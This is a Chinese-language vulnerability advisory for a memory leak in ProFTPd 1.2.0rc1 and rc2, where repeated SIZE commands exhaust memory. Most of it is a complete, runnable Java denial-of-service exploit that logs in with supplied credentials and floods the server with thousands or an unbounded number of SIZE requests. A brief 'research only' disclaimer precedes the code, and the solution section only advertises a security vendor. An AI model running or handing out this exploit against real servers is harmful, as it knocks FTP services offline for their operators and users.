ProFTPd 遠程拒絕服務漏洞 (APP,缺陷)

涉及程式：
ProFTPd
 
描述：
ProFTPd 記憶體泄露引起拒絕服務的攻擊
 
詳細：
ProFTPd 是一款非常流行的 FTP 伺服器。發現它存在一個安全性漏洞，允許惡意使用者對它進行拒絕服務的攻擊。

當 ProFTPd 執行 SIZE FTP 命令時會引起記憶體泄露漏洞，如果發送大約5000次 SIZE FTP 命令到伺服器中可能引起 ProFTPd 耗費超過300KB的記憶體。如果發送更多的SIZE 命令將引起拒絕服務的攻擊。

以下代碼僅僅用來測試和研究這個漏洞，如果您將其用於不正當的途徑請後果自負

*/

import java.net.*;
import java.io.*;

class TCPconnection {

 　public TCPconnection (String hostname, int portnumber) throws Exception {
 　Socket s = doaSocket(hostname, portnumber);
 　br = new BufferedReader (new InputStreamReader (s.getInputStream()));
 　ps = new PrintStream (s.getOutputStream());
 　}

 　public String readLine() throws Exception {
 　String s;
 　try { s = br.readLine(); }
 　catch (IOException ioe) {
 　System.out.println("TCP Error ... it's a little hax0r exception ;-)");
 　throw new Exception ("/nInput Error: I/O Error");
 　　}
 　return s;
 　}

 　public void println(String s) {
 　　ps.println(s);
 　}

 　private Socket doaSocket(String hostname, int portnumber) throws Exception {
 　Socket s = null;
 　int attempts = 0;
 　while (s == null && attempts<maxattempts) {
 　try { s = new Socket(hostname, portnumber); }
 　catch (UnknownHostException uhe) {
 　System.err.println("It was no posible to establish the TCP connection./n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
 　throw new Exception("/nConnection Error: " + "unknown hostname");
 　}
 　catch (IOException ioe) {
 　System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
 　}
 　attempts++;
 　}
 　if (s == null) throw new IOException("/nThe connection was not accomplished due to an I/O Error: trying it again ...");
 　else return s; }
 　private final int maxattempts = 5;
 　private BufferedReader br;
 　private PrintStream ps;

 　}

class proftpDoS {

 　public static void main(String[] arg) throws Exception {
 　InputStreamReader isr;
 　BufferedReader tcld;
 　String hostnamez, username, password, file, s1, option;
 　int i, j, k;
 　isr = new InputStreamReader(System.in);
 　tcld = new BufferedReader(isr);
 　System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
 　System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
 　hostnamez = "";
 　while (hostnamez.length()==0) {
 　System.out.print("Please enter the hostname/IP: ");
 　hostnamez = tcld.readLine(); }
 　username = "";
 　while (username.length()==0) {
 　System.out.print("Enter the username: ");
 　username = tcld.readLine(); }
 　password = "";
 　while (password.length()==0) {
 　System.out.print("Enter the password for that username: ");
 　password = tcld.readLine(); }
 　file = "";
 　while (file.length()==0) {
 　System.out.print("Enter a valid filename on the FTP /n(with correct path of course ;-): ");
 　file = tcld.readLine(); }
 　System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
 　System.out.println("1) Request 10000 size's to the server (it may be enough)");
 　System.out.println("2) /"No pain no gain/" (pseudo-eternal requests, ey it may be harm ;-P)");
 　System.out.print("Option: ");
 　option = tcld.readLine();
 　k = Integer.parseInt(option);
 　while (!(k==1 || k==2)) {
 　System.out.print("Option not valid, please try again: ");
 　option = tcld.readLine();
 　k = Integer.parseInt(option); }
 　TCPconnection tc = new TCPconnection(hostnamez, 21);
 　tc.println("user " + username);
 　tc.println("pass " + password);
 　if (k==1) {
 　　for(i=0;i<10000;i++)
 　　tc.println("size " + file); }
 　else if (k==2) {
 　for(i=1;i<100;i++)
 　　for(j=2;j<((int)Math.pow(j,i ));j++)
 　　　 tc.println("size " + file); }
 　tc.println("quit");
 　s1 = tc.readLine();
 　while (s1!=null) {
 　s1 = tc.readLine();
 　System.out.println("Attack completed ... as one of my friends says:");
 　System.out.println("Hack just r0cks ;-)");
 　}
 　}
}

受影響的系統：
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2　
 
解決方案：
CNNS 為您提供完善的網路安全服務。